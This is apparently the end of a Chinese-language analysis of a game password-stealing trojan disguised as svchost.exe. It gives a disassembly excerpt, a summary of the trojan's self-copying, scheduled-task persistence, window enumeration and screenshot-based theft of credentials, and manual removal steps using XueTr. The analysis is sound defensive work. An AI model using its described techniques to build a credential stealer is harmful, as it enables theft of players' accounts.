- 00411B52 . 68 305C4000 push svchost.00405C30 ; Write
- 00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
- 00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
- 00411B5D . 53 push ebx
- 00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
- 00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
- 00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
- 00411B69 . 51 push ecx
- 00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
- 00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
- 00411B70 . 52 push edx
- 00411B71 . FFD7 call edi
- 00411B73 . 83C4 10 add esp,10
- 00411B76 . 50 push eax
- 00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
- 00411B7D . 50 push eax
- 00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
- 00411B84 . 83C4 1C add esp,1C
- 00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
- 00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
- 00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
- 00411B93 . 53 push ebx
- 00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
- 00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
- 00411B9C . 50 push eax
- 00411B9D . 51 push ecx
- 00411B9E . FFD7 call edi
- 00411BA0 . 83C4 10 add esp,10
- 00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
- 00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
- 00411BAB . 52 push edx
- 00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
- 00411BB2 . 50 push eax
- 00411BB3 . E8 E8030000 call svchost.00411FA0
- 00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
- 00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
- 00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
- 00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
- 00411BC7 . 53 push ebx
- 00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
- 00411BCD . 53 push ebx
- 00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
- 00411BD3 . 53 push ebx
- 00411BD4 . 68 805C4000 push svchost.00405C80 ; All
- 00411BD9 . 53 push ebx
- 00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
總結:
1.獲取指定目錄並創建目錄,自我複製,然後運行。
2.創建bat實現計劃任務指定時間運行木馬。
3.結束自身。
4.複製後的程序通過查找窗口,枚舉進程方法獲取遊戲窗口截取密碼。
5.至於密保,就是利用截屏,然後發送到指定地址。
由於本人能力的有限,錯誤及遺漏在所難免! 或許原理並沒有這麼簡單,還請其他高手作出指點. 萬分感謝!
查殺方法:
首先用XueTr.exe結束木馬進程svchost.exe(即C:\WINDOWS\system32\Pusmint目錄下的那個,不是系統自身的svchost.exe;不結束怎麼刪除哈),然後
到這個目錄刪除C:\WINDOWS\system32\Pusmint下所有的文件。
然後運行XueTr.exe切換到啟動項就明朗了,直接刪除那些由上面bat用AT命令建立的*.JOB計劃任務項目。